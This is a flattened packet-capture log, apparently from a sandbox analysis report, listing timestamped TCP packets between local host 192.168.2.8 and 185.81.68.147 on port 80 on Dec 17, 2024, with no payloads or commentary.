                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.530674934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.530698061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.531584024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.531681061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.531699896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.531733990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.532450914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.582295895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.678064108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.678169012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.678338051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.678452969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.678566933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.678668022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.679470062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.679501057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.679632902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.680402040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.680535078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.680617094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.681276083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.681346893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.681473970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.682286024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.682467937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.682625055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.683202982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.683391094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.683793068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.684195995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.684283972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.684372902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.685126066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.685204029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.685292006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.686068058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.686135054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.686249971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.687030077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.687129974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.687228918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.687988997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.688118935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.688286066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.688949108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.689090014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.689191103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.689919949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.689995050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.690264940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.690968990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.691066027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.691158056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.691788912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.691950083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.692209959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.692732096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.692889929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.693005085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.693681955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.693739891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.693969965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.694672108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.694792032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.694869041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.695574999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.695688009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.695818901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.696544886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.696682930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.696787119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.697484970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.697593927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.697711945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.698427916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.698559999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.698795080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.699429035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.699531078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.699641943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.700510979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.700632095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.700720072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.701776028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.701898098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.701983929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.702788115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.702917099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.702991962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.703610897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.703632116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.703722954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.704262972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.704477072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.704607010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.705151081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.705324888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.705447912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.706068039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.706187963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.706262112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.707195997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.707300901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.707437992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.708153009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.708221912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.708414078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.709048986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.709120035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.709253073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.709909916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.710012913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.710135937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.710838079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.710913897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.710999012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.711781979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.711896896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.711971045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.712704897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.712827921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.712904930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.713685989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.713814974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.713897943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.714634895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.714735031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.714823008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.715709925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.715958118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.716058969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.716595888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.716659069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.716779947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.717490911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.717576981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.717659950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.718463898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.718553066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.718758106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.719443083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.719693899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.720027924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.720360994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.720485926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.720670938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.721316099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.721400976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.721482992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.722265959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.722383022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.722492933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.723265886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.723404884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.723547935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.724188089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.724256992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.724473000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.725219011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.725388050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.725469112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.726073980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.726247072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.726630926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.727060080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.727191925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.727335930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.728035927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.769834042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870065928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870199919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870335102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870630980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870742083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870830059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.870877981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.871659994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.871714115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.871843100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.872598886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.872713089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.872865915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.873538017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.873756886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.873868942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.874500036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.874639988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.874681950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.875468969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.875535965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.875619888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.876389980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.876488924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.876581907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.877388954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.877554893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.877633095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.878350973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.878472090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.878554106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.879245996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.879327059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.879415035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.880234003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.880300999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.880384922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.881153107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.881202936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.881206989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.882199049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.882234097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.882289886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.883085012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.883152008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.883193016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.884016037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.884139061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.884232044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.884968996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.885102034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.885200024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.885909081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.886054993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.886142969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.886883020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.886954069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.887003899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.887816906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.887943029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.888098001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.888809919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.888884068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.889019966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.889740944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.889879942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.889904976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.890688896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.890779018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.890932083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.891630888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.891755104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.891836882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.892604113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.892716885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.892745972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.893528938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.893630981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.893635988 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.894464016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.894553900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.894620895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.895714998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.895764112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.895781994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.896400928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.896497011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.896595001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.897330999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.897375107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.897444010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.898392916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.898453951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.898507118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.899265051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.899336100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.899337053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.900248051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.900476933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.900614023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.901149988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.901238918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.901341915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.902093887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.902148008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.902241945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.903105974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.903155088 CET8049709185.81.68.147192.168.2.8
